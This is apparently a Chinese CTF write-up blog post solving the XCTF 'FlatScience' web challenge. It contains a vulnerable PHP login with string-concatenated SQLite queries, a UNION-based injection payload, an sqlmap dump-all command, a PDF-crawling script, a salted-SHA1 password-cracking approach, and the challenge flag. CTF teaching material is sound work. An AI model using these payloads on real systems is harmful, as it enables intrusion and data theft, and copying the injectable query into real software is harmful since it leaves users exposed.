攻防世界 FlatScience

已于 2024-06-19 15:35:39 修改
阅读量675 收藏 3
点赞数 16
文章标签: web安全
于 2024-06-19 15:30:45 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_63640108/article/details/139802429
版权

先awvs扫一下找一下渗透思路

有一个高危漏洞是sql注入的

进行注入点测试

页面不同 注入点存在

fuzz了一下 ‘ 时有报错

没意识到这里是sqllite数据库后面一直尝试不成功

查看页面报错源码后发现

debug参数没删除 访问后出现源码

<?php
ob_start();
?>
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN">

<html>
<head>
<style>
blockquote { background: #eeeeee; }
h1 { border-bottom: solid black 2px; }
h2 { border-bottom: solid black 1px; }
.comment { color: darkgreen; }
</style>

<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<title>Login</title>
</head>
<body>


<div align=right class=lastmod>
Last Modified: Fri Mar  31:33:7 UTC 1337
</div>

<h1>Login</h1>

Login Page, do not try to hax here plox!<br>


<form method="post">
  ID:<br>
  <input type="text" name="usr">
  <br>
  Password:<br> 
  <input type="text" name="pw">
  <br><br>
  <input type="submit" value="Submit">
</form>

<?php
if(isset($_POST['usr']) && isset($_POST['pw'])){
        $user = $_POST['usr'];
        $pass = $_POST['pw'];

        $db = new SQLite3('../fancy.db');
        
        $res = $db->query("SELECT id,name from Users where name='".$user."' and password='".sha1($pass."Salz!")."'");
    if($res){
        $row = $res->fetchArray();
    }
    else{
        echo "<br>Some Error occourred!";
    }

    if(isset($row['id'])){
            setcookie('name',' '.$row['name'], time() + 60, '/');
            header("Location: /");
            die();
    }

}

if(isset($_GET['debug']))
highlight_file('login.php');
?>
<!-- TODO: Remove ?debug-Parameter! -->




<hr noshade>
<address>Flux Horst (Flux dot Horst at rub dot flux)</address>
</body>

分析源码得知查询返回 在setcookie里

抓包设置 sqlite注入的payload:1' union select name,sql from sqlite_master--+

CREATE TABLE Users(id int primary key,name varchar(255),password varchar(255),hint varchar(255))

查询一下各个列的信息

这题sqlmap也可以解决

python sqlmap.py -r E:\tools\test.txt --risk 3 --level 5 --dump-all --batch

hint内提示密码要与网页内pdf结合

参考了网上脚本

FlatScience XCTF web进阶区FlatScience详解-CSDN博客

下载pdf

import re
import requests
import os

regular_pdf = '[a-fA-F0-9]{32,32}.pdf'
regular_url = '\d/'
root_url = 'http://61.147.171.105:62823/'
pdf_list = []

def get_url(url):
    result = requests.get(url + "index.html")
    if result.status_code == 404:
        return
    re_url = re.findall(regular_url, result.text)
    print(re_url)
    re_pdf = re.findall(regular_pdf, result.text)
    for pdf in re_pdf:
        pdf_list.append(url + pdf)
    if re_url:
        for suffix_url in re_url:
            get_url(url + suffix_url)
    else:
        return

def download_pdf(pdf_list):
    for pdf_url in pdf_list:
        result = requests.get(pdf_url)
        file_path = os.path.join('E:\\tools\\test', pdf_url[-36:])
        with open(file_path, 'wb') as file:
            file.write(result.content)

get_url(root_url)
print(pdf_list)
download_pdf(pdf_list)

每个单词末尾加上Salz!后进行sha1加密对比admin的password值

找到admin密码

ThinJerboa

admin.php登录

flag{Th3_Fl4t_Earth_Prof_i$_n0T_so_Smart_huh?}

璃怜月
关注
  • 16
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
攻防世界—-(web进阶)FlatScience–WP
12-14
在这个“攻防世界—-(web进阶)FlatScience–WP”的挑战中,我们需要解决一个Web安全相关的谜题。这个谜题涉及到多个技术点,包括Web应用漏洞利用、数据库注入、PDF文件处理以及哈希算法的应用。 首先,我们注意到...
攻防世界Wire1杂项
11-20
攻防世界Wire1杂项,misc。 此题详细解题博客:https://danbaku.blog.csdn.net/article/details/127951997
攻防世界流量分析2杂项
11-20
攻防世界流量分析2杂项,misc。 此题详细解题博客:https://danbaku.blog.csdn.net/article/details/127953659
攻防世界Fakezip杂项
11-20
攻防世界Fakezip杂项】是一道网络安全领域中的挑战,属于攻防世界的Misc类问题。Misc( Miscellaneous)通常指的是涉及多种技术、需要综合运用知识的题目,这道题目的核心在于理解和处理压缩文件,特别是涉及到...
攻防世界running
11-15
攻防世界running杂项,misc。 此题详细解题博客:https://blog.csdn.net/m0_59188912/article/details/127861757
【网络安全】资产记录工具 Hacker Asset Logger 安装使用详细教程
等风来
07-15 161
在对某一应用程序的多个页面、对多个相关联的应用程序进行渗透测试的过程中,多个请求包的参数、功能之间可能存在一定的联系。例如,在A页面触发的请求包中,通过UID可获取CustomerID;在B页面触发的请求包中,CustomerID用于Cookie身份鉴定、获取用户敏感信息、获取用户订单号OrderNo;在C页面触发的请求包中,OrderNo用于获取对应用户的敏感信息,如姓名、电话、地址、身份证。
【网络安全】基于PHP study的DVWA靶场搭建教程
等风来
07-14 477
接着访问:http://127.0.0.1/dvwa-master,拉到页面最下面点击Create/Reset Databse 跳转至该页面后,输入admin、password即可登录:
网络安全-网络安全及其防护措施8
LS_Ai的博客
07-17 1064
数据中心网络架构是指数据中心内部网络的设计和结构,其目的是提供高性能、高可用性和高扩展性的网络连接。合理的数据中心网络架构能够支持大规模数据处理和传输,满足数据中心的业务需求,提高整体运营效率。负载均衡是一种分配网络流量和计算任务的方法,旨在优化资源利用率、提高系统性能和增强服务可用性。通过将请求分配到多个服务器上,负载均衡避免了单点故障和性能瓶颈,确保系统稳定和高效运行。网络安全策略是指为保护网络和信息系统的安全而制定的一系列规则和措施。
网络安全法律框架更新:最新合规要求与企业应对策略
2301_79955948的博客
07-14 938
首先,企业应提升网络安全意识,完善责任制度,并关注新法律法规的协调衔接。2022年,《网络安全法》迎来了首次修改,这一修订主要是为了与《数据安全法》和《个人信息保护法》等新实施的法律进行衔接协调,完善法律责任制度,进一步保障网络安全。新规定对原有的触发条件进行了优化,例如,关键信息基础设施运营者向境外提供个人信息或重要数据,以及特定数量的个人信息或敏感个人信息的跨境传输,都需要进行安全评估。通过上述措施,企业不仅能够提升自身的网络安全防护能力,还能促进国内网络安全产业的高质量发展,为国家网络安全贡献力量。
网络安全-网络安全及其防护措施1
LS_Ai的博客
07-14 1022
网络安全是指保护网络系统及其数据免受未经授权的访问、使用、修改或破坏的过程。它包括对硬件、软件、数据和通信的全面保护,确保系统的机密性、完整性和可用性。网络安全涉及一系列的策略、技术和流程,用于保护网络和数据免受攻击、损失或未经授权的访问。机密性:确保信息只被授权人员访问和查看。完整性:保证信息的准确和完整,防止未经授权的修改。可用性:确保系统和数据在需要时可被合法用户访问。
网络安全等级保护测评
weixin_45840241的博客
07-16 444
具体来说,等级保护定级是指根据信息系统在国家安全、社会稳定、经济秩序和公共利益方面的最重要程度以及风险威胁、安全需求、安全成本等因素,将其划分不同的安全保护等级并采取相应等级的安全保护技术、管理措施。通过等级保护测评服务,可以全面检测信息系统的安全性能,发现存在的安全问题和漏洞,及时采取措施进行修复和改进,确保系统具备较高的安全性,降低系统被各种攻击的风险。通过等级保护测评服务,可以帮助组织了解其信息系统的安全状况,提供相应的解决方案,优化安全管理,提高信息安全防护能力。
黑客自学手册(网络安全
dexi1113的博客
07-18 624
此教程为纯技术分享!本教程的目的决不是为那些怀有不良动机的人提供及技术支持!
网络安全相关竞赛比赛
最新发布
黑战士的博客
07-18 368
湖南省委网信办联合省教育厅、省广播电视局、省政务管理服务局、省通信管理局、长沙市人民政府等6家单位共同主办。教育部认可的大学生学科竞赛网站链接(2023版)关键字:比赛、CTF、赛事、技能挑战。浙江省大学生网络与信息安全竞赛。全国网络安全行业职业技能大赛。湖南省“网安湘军杯”
网络安全 DVWA通关指南 DVWA Brute Force (爆破)
YueXuan_521的博客
07-15 762
网络安全 DVWA通关指南 DVWA Brute Force ( DVWA Brute Force (爆破) 文章目录 DVWA Brute Force (爆破) Low Medium High Impossible遍历,只是一个选字典1,一个选字典2(相当于50m赛跑同时出发,只是赛道不同,互不干扰。2、密码验证方面,增加验证失败睡眠两秒的限制,这会加大爆破所需要的时间。但只要时间充足,爆破出密码不是问题。使用字典进行爆破,字典可以自己制作,也可以网上直接下载,等待片刻爆破完成,使用爆破出的密码就能登录。
网络安全-等级保护制度介绍
weixin_56233402的博客
07-18 267
以等级保护为标准开展安全建设,可以让单位自身安全建设更加体系化,可以从物理、网络、主机、应用、数据多个方面成体系进行安全建设,再也不会头疼医脚脚痛医头,对本单位的安全建设有了整体的规划和思路。责任更清晰,完成等保测评意味着公安机关认可你的安全现状,一旦发生安全事件是意外,如果没有进行等级保护测评意味着你没有达到国家要求,用户单位承担主要责任,网监部门会直接进行比较严厉的处罚。《信息系统安全保护等级定级指南》GB/T 22240-2008。《基本要求》《定级指南》《实施指南》《测评标准》
【网络文明】关注网络安全
Liang_z_的博客
07-13 993
网络安全是指保护网络系统的硬件、软件及其存储、传输的数据不被非法访问、篡改、泄露或破坏的过程。这包括了保护个人电脑、智能手机、服务器、网络基础设施等设备的安全,确保电子通信的私密性、完整性和可用性。网络安全是一项系统工程,涉及政府、企业、社会组织和每个个体。在享受互联网带来的便利的同时,我们每个人都应承担起维护网络安全的责任。通过持续的学习、实践和合作,构建一个更加安全、可信的网络环境,让科技真正造福人类社会。程序员作为数字时代的建设者,我们的每一行代码都承载着责任与使命。
企业安全性的新前沿:智能合约在网络安全中的角色
weixin_44672358的博客
07-15 684
智能合约是一种以代码形式存在的自动化合约,运行在区块链上。它们通过预先编程的规则和条件执行,并在满足特定条件时自动执行相关操作。智能合约可以实现自动化、透明和不可篡改的交易和协议,因此被广泛应用于金融、供应链管理和物联网等领域。智能合约作为区块链技术的一项创新应用,为企业安全性带来了新的前沿和解决方案。它不仅提升了传统安全措施的效率和效果,还为企业在面对复杂和多变的网络安全威胁时提供了全新的应对方式。随着技术的进一步发展和普及,智能合约有望在企业安全性保护中发挥越来越重要的角色。
网络安全-网络安全及其防护措施9
LS_Ai的博客
07-18 599
网络故障排除是指通过系统化的方法和工具,识别、诊断和解决网络中出现的问题,以恢复正常的网络服务和性能。有效的故障排除可以减少停机时间,提升网络的稳定性和可靠性。网络优化是指通过各种技术和策略,改善网络的性能、稳定性和效率,确保网络能够高效、稳定地支持各种业务和应用需求。网络规划与设计是指在考虑业务需求、技术条件和预算的基础上,制定网络的结构、配置和策略,确保网络的高效、安全和可靠运行。网络虚拟化技术是通过软件定义的方法,将物理网络资源抽象为逻辑网络资源,实现网络的灵活配置和管理。
网络安全等级保护制度是如何分级的?
gmqqcsdn的博客
07-18 477
网络安全等级保护制度是中国网络安全法的重要组成部分,它通过对信息系统进行安全等级划分,要求各等级系统采取相应的安全保护措施,以防范和减少网络安全事件的发生。等保制度的实施,标志着中国网络安全管理迈入了标准化、法制化的新时代。该制度根据网络在国家安全、经济建设、社会生活中的重要程度,以及网络一旦遭受破坏、丧失功能或数据被篡改、泄露、丢失、损毁后对国家安全、社会秩序、公共利益以及相关公民、法人和其他组织的合法权益的危害程度等因素,将网络分为五个安全保护等级。第一级。
攻防世界 easyphp
09-11
EasyPHP是一个用于Windows操作系统的开发环境,它集成了Apache服务器、MySQL数据库和PHP解释器,使得搭建和管理网站变得更加简单。在EasyPHP中,攻防世界是一个基于CTF(Capture The Flag)赛制的在线平台,旨在提供网络安全学习和竞赛的机会。 攻防世界平台上有各种不同的题目和挑战,涵盖了网络安全的多个方面,包括但不限于Web漏洞、系统漏洞、密码学等。参与者需要通过解决这些挑战来学习和提高自己的网络安全技能。同时,攻防世界也提供了一些教程和文章,帮助新手入门并引导他们深入理解攻击和防御的原理。 对于初学者来说,攻防世界的easyphp环境可以作为一个很好的起点,因为它提供了一个集成的开发环境,使得学习和实践变得更加方便。通过解决平台上的题目和挑战,初学者可以逐渐熟悉常见的安全漏洞和攻击技术,并学会如何进行相应的防御措施。 希望以上信息对你有所帮助!如果你有任何其他问题,请随时提问。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值